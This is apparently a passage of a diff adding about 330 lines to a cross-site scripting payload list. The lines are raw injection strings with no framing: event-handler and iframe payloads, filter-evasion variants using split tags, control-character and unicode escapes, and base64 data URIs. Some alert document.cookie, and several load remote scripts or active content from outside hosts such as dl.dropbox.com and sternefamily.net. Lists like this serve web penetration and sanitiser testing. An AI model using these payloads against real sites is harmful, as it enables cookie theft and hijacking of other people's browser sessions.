1209
|
+
<svg/onload=%26%23097lert%26lpar;1337)>
|
|
1210
|
+
<script>for((i)in(self))eval(i)(1)</script>
|
|
1211
|
+
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
|
|
1212
|
+
<sCR<script>iPt>alert(1)</SCr</script>IPt>
|
|
1213
|
+
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
|
|
1214
|
+
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
|
|
1215
|
+
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
|
|
1216
|
+
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
|
|
1217
|
+
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
|
|
1218
|
+
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
|
|
1219
|
+
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
|
|
1220
|
+
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
|
|
1221
|
+
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
|
|
1222
|
+
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
|
|
1223
|
+
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
|
|
1224
|
+
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))">
|
|
1225
|
+
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))">
|
|
1226
|
+
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))">
|
|
1227
|
+
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))">
|
|
1228
|
+
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))">
|
|
1229
|
+
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))">
|
|
1230
|
+
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))">
|
|
1231
|
+
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))">
|
|
1232
|
+
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))">
|
|
1233
|
+
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))">
|
|
1234
|
+
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))">
|
|
1235
|
+
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))">
|
|
1236
|
+
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))">
|
|
1237
|
+
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))">
|
|
1238
|
+
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))">
|
|
1239
|
+
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))">
|
|
1240
|
+
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))">
|
|
1241
|
+
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))">
|
|
1242
|
+
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))">
|
|
1243
|
+
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))">
|
|
1244
|
+
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))">
|
|
1245
|
+
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))">
|
|
1246
|
+
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))">
|
|
1247
|
+
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))">
|
|
1248
|
+
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))">
|
|
1249
|
+
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))">
|
|
1250
|
+
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))">
|
|
1251
|
+
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))">
|
|
1252
|
+
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))">
|
|
1253
|
+
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))">
|
|
1254
|
+
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))">
|
|
1255
|
+
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))">
|
|
1256
|
+
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))">
|
|
1257
|
+
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))">
|
|
1258
|
+
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))">
|
|
1259
|
+
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))">
|
|
1260
|
+
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))">
|
|
1261
|
+
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))">
|
|
1262
|
+
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))">
|
|
1263
|
+
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))">
|
|
1264
|
+
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))">
|
|
1265
|
+
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))">
|
|
1266
|
+
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))">
|
|
1267
|
+
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))">
|
|
1268
|
+
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))">
|
|
1269
|
+
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))">
|
|
1270
|
+
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
|
|
1271
|
+
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))">
|
|
1272
|
+
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))">
|
|
1273
|
+
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))">
|
|
1274
|
+
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))">
|
|
1275
|
+
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))">
|
|
1276
|
+
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))">
|
|
1277
|
+
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))">
|
|
1278
|
+
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))">
|
|
1279
|
+
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))">
|
|
1280
|
+
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))">
|
|
1281
|
+
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))">
|
|
1282
|
+
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))">
|
|
1283
|
+
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))">
|
|
1284
|
+
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))">
|
|
1285
|
+
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))">
|
|
1286
|
+
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))">
|
|
1287
|
+
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
|
|
1288
|
+
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
|
|
1289
|
+
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
|
|
1290
|
+
<INPUT TYPE="BUTTON" action="alert('XSS')"/>
|
|
1291
|
+
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
|
|
1292
|
+
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
|
|
1293
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
1294
|
+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
|
|
1295
|
+
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
|
|
1296
|
+
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
|
|
1297
|
+
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
|
|
1298
|
+
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
|
|
1299
|
+
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
|
|
1300
|
+
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
|
|
1301
|
+
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
|
|
1302
|
+
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
|
|
1303
|
+
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
|
|
1304
|
+
<iframe src=http://xss.rocks/scriptlet.html <
|
|
1305
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
1306
|
+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
|
|
1307
|
+
<iframe src="	javascript:prompt(1)	">
|
|
1308
|
+
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
|
|
1309
|
+
<input/onmouseover="javaSCRIPT:confirm(1)"
|
|
1310
|
+
<sVg><scRipt >alert(1) {Opera}
|
|
1311
|
+
<img/src=`` onerror=this.onerror=confirm(1)
|
|
1312
|
+
<form><isindex formaction="javascript:confirm(1)"
|
|
1313
|
+
<img src=``
 onerror=alert(1)

|
|
1314
|
+
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
|
|
1315
|
+
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
|
|
1316
|
+
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
|
|
1317
|
+
<script /**/>/**/alert(1)/**/</script /**/
|
|
1318
|
+
"><h1/onmouseover='\u0061lert(1)'>
|
|
1319
|
+
<iframe/src="data:text/html,<svg onload=alert(1)>">
|
|
1320
|
+
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
|
1321
|
+
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script
|
|
1322
|
+
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
|
|
1323
|
+
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
|
1324
|
+
<iframe src=javascript:alert(document.location)>
|
|
1325
|
+
<form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
|
|
1326
|
+
<img/	  src=`~` onerror=prompt(1)>
|
|
1327
|
+
<form><iframe 	  src="javascript:alert(1)" 	;>
|
|
1328
|
+
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
|
|
1329
|
+
http://www.google<script .com>alert(document.location)</script
|
|
1330
|
+
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
|
|
1331
|
+
<img/src=@  onerror = prompt('1')
|
|
1332
|
+
<style/onload=prompt('XSS')
|
|
1333
|
+
<script ^__^>alert(String.fromCharCode(49))</script ^__^
|
|
1334
|
+
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
|
|
1335
|
+
�</form><input type="date" onfocus="alert(1)">
|
|
1336
|
+
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
|
|
1337
|
+
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
|
|
1338
|
+
<iframe srcdoc='<body onload=prompt(1)>'>
|
|
1339
|
+
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
|
|
1340
|
+
<script ~~~>alert(0%0)</script ~~~>
|
|
1341
|
+
<style/onload=<!--	> alert (1)>
|
|
1342
|
+
<///style///><span %2F onmousemove='alert(1)'>SPAN
|
|
1343
|
+
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
|
|
1344
|
+
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
|
|
1345
|
+
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
|
|
1346
|
+
<marquee onstart='javascript:alert(1)'>^__^
|
|
1347
|
+
<div/style="width:expression(confirm(1))">X</div> {IE7}
|
|
1348
|
+
<iframe// src=javaSCRIPT:alert(1)
|
|
1349
|
+
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
|
|
1350
|
+
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
|
|
1351
|
+
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
|
|
1352
|
+
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
|
|
1353
|
+
<a/href="javascript: javascript:prompt(1)"><input type="X">
|
|
1354
|
+
</plaintext\></|\><plaintext/onmouseover=prompt(1)
|
|
1355
|
+
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
|
|
1356
|
+
<a href="javascript:\u0061le%72t(1)"><button>
|
|
1357
|
+
<div onmouseover='alert(1)'>DIV</div>
|
|
1358
|
+
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
|
1359
|
+
<a href="jAvAsCrIpT:alert(1)">X</a>
|
|
1360
|
+
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
1361
|
+
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
|
1362
|
+
<var onmouseover="prompt(1)">On Mouse Over</var>
|
|
1363
|
+
<a href=javascript:alert(document.cookie)>Click Here</a>
|
|
1364
|
+
<img src="/" =_=" title="onerror='prompt(1)'">
|
|
1365
|
+
<%<!--'%><script>alert(1);</script -->
|
|
1366
|
+
<script src="data:text/javascript,alert(1)"></script>
|
|
1367
|
+
<iframe/src \/\/onload = prompt(1)
|
|
1368
|
+
<iframe/onreadystatechange=alert(1)
|
|
1369
|
+
<svg/onload=alert(1)
|
|
1370
|
+
<input value=<><iframe/src=javascript:confirm(1)
|
|
1371
|
+
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
|
|
1372
|
+
http://www.<script>alert(1)</script .com
|
|
1373
|
+
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
|
|
1374
|
+
<svg><script ?>alert(1)
|
|
1375
|
+
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
|
1376
|
+
<img src=`xx:xx`onerror=alert(1)>
|
|
1377
|
+
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
|
1378
|
+
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
|
|
1379
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
1380
|
+
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
|
1381
|
+
<svg contentScriptType=text/vbs><script>MsgBox+1
|
|
1382
|
+
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
|
1383
|
+
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
|
1384
|
+
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
|
1385
|
+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
|
1386
|
+
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
|
|
1387
|
+
<object data=javascript:\u0061le%72t(1)>
|
|
1388
|
+
<script>+-+-1-+-+alert(1)</script>
|
|
1389
|
+
<body/onload=<!-->
alert(1)>
|
|
1390
|
+
<script itworksinallbrowsers>/*<script* */alert(1)</script
|
|
1391
|
+
<img src ?itworksonchrome?\/onerror = alert(1)
|
|
1392
|
+
<svg><script>//
confirm(1);</script </svg>
|
|
1393
|
+
<svg><script onlypossibleinopera:-)> alert(1)
|
|
1394
|
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
1395
|
+
<script x> alert(1) </script 1=2
|
|
1396
|
+
<div/onmouseover='alert(1)'> style="x:">
|
|
1397
|
+
<--`<img/src=` onerror=alert(1)> --!>
|
|
1398
|
+
<script/src=data:text/javascript,alert(1)></script>
|
|
1399
|
+
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
|
|
1400
|
+
"><img src=x onerror=window.open('https://www.google.com/');>
|
|
1401
|
+
<form><button formaction=javascript:alert(1)>CLICKME
|
|
1402
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
1403
|
+
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
|
|
1404
|
+
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
|
1405
|
+
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
|
1406
|
+
<script\x20type="text/javascript">javascript:alert(1);</script>
|
|
1407
|
+
<script\x3Etype="text/javascript">javascript:alert(1);</script>
|
|
1408
|
+
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
|
|
1409
|
+
<script\x09type="text/javascript">javascript:alert(1);</script>
|
|
1410
|
+
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
|
|
1411
|
+
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
|
|
1412
|
+
<script\x0Atype="text/javascript">javascript:alert(1);</script>
|
|
1413
|
+
'`"><\x3Cscript>javascript:alert(1)</script>
|
|
1414
|
+
'`"><\x00script>javascript:alert(1)</script>
|
|
1415
|
+
<img src=1 href=1 onerror="javascript:alert(1)"></img>
|
|
1416
|
+
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
|
|
1417
|
+
<video src=1 href=1 onerror="javascript:alert(1)"></video>
|
|
1418
|
+
<body src=1 href=1 onerror="javascript:alert(1)"></body>
|
|
1419
|
+
<image src=1 href=1 onerror="javascript:alert(1)"></image>
|
|
1420
|
+
<object src=1 href=1 onerror="javascript:alert(1)"></object>
|
|
1421
|
+
<script src=1 href=1 onerror="javascript:alert(1)"></script>
|
|
1422
|
+
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
|
|
1423
|
+
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
|
|
1424
|
+
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
|
|
1425
|
+
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
|
|
1426
|
+
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
|
|
1427
|
+
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
|
|
1428
|
+
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
|
|
1429
|
+
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
|
|
1430
|
+
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
|
|
1431
|
+
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
|
|
1432
|
+
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
|
|
1433
|
+
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
|
|
1434
|
+
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
|
|
1435
|
+
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
|
|
1436
|
+
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
|
|
1437
|
+
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
|
|
1438
|
+
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
|
|
1439
|
+
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
|
|
1440
|
+
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
|
|
1441
|
+
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
|
|
1442
|
+
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
|
|
1443
|
+
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
|
|
1444
|
+
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
|
|
1445
|
+
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
|
|
1446
|
+
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
|
|
1447
|
+
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
|
|
1448
|
+
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
|
|
1449
|
+
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
|
|
1450
|
+
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
|
|
1451
|
+
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
|
|
1452
|
+
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
|
|
1453
|
+
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
|
|
1454
|
+
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
|
|
1455
|
+
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
|
|
1456
|
+
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
|
|
1457
|
+
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
|
|
1458
|
+
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
|
|
1459
|
+
<object onError object onError="javascript:javascript:alert(1)"></object onError>
|
|
1460
|
+
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
|
|
1461
|
+
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
|
|
1462
|
+
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
|
|
1463
|
+
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
|
|
1464
|
+
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
|
|
1465
|
+
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
|
|
1466
|
+
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
|
|
1467
|
+
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
|
|
1468
|
+
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
|
|
1469
|
+
<body onload body onload="javascript:javascript:alert(1)"></body onload>
|
|
1470
|
+
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
|
|
1471
|
+
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
|
|
1472
|
+
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
|
|
1473
|
+
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
|
|
1474
|
+
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
|
|
1475
|
+
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
|
|
1476
|
+
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
|
|
1477
|
+
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
|
|
1478
|
+
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
|
|
1479
|
+
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
|
|
1480
|
+
\x3Cscript>javascript:alert(1)</script>
|
|
1481
|
+
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
|
|
1482
|
+
<script>javascript:alert(1)</script\x0D
|
|
1483
|
+
<script>javascript:alert(1)</script\x0A
|
|
1484
|
+
<script>javascript:alert(1)</script\x0B
|
|
1485
|
+
<script charset="\x22>javascript:alert(1)</script>
|
|
1486
|
+
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
|
|
1487
|
+
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
|
|
1488
|
+
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> -->
|
|
1489
|
+
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> -->
|
|
1490
|
+
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> -->
|
|
1491
|
+
`"'><img src='#\x27 onerror=javascript:alert(1)>
|
|
1492
|
+
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
|
|
1493
|
+
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
|
|
1494
|
+
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1495
|
+
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1496
|
+
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1497
|
+
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1498
|
+
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1499
|
+
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1500
|
+
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1501
|
+
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1502
|
+
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1503
|
+
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1504
|
+
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1505
|
+
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1506
|
+
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1507
|
+
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
1508
|
+
<script>/* *\x2A/javascript:alert(1)// */</script>
|
|
1509
|
+
<script>/* *\x00/javascript:alert(1)// */</script>
|
|
1510
|
+
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
1511
|
+
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
1512
|
+
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
1513
|
+
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
1514
|
+
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
|
|
1515
|
+
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
|
|
1516
|
+
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
|
|
1517
|
+
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
|
|
1518
|
+
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
|
|
1519
|
+
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
|
|
1520
|
+
'`"><\x3Cscript>javascript:alert(1)</script>
|
|
1521
|
+
'`"><\x00script>javascript:alert(1)</script>
|
|
1522
|
+
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
|
|
1523
|
+
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
|
|
1524
|
+
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
|
|
1525
|
+
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
|
|
1526
|
+
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
|
|
1527
|
+
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
|
|
1528
|
+
<script\x20type="text/javascript">javascript:alert(1);</script>
|
|
1529
|
+
<script\x3Etype="text/javascript">javascript:alert(1);</script>
|
|
1530
|
+
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
|
|
1531
|
+
<script\x09type="text/javascript">javascript:alert(1);</script>
|
|
1532
|
+
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
|
|
1533
|
+
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
|
|
1534
|
+
<script\x0Atype="text/javascript">javascript:alert(1);</script>
|
|
1535
|
+
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
|
|
1536
|
+
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
|
|
1537
|
+
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
|
|
1538
|
+
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
|
|
1539
|
+
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
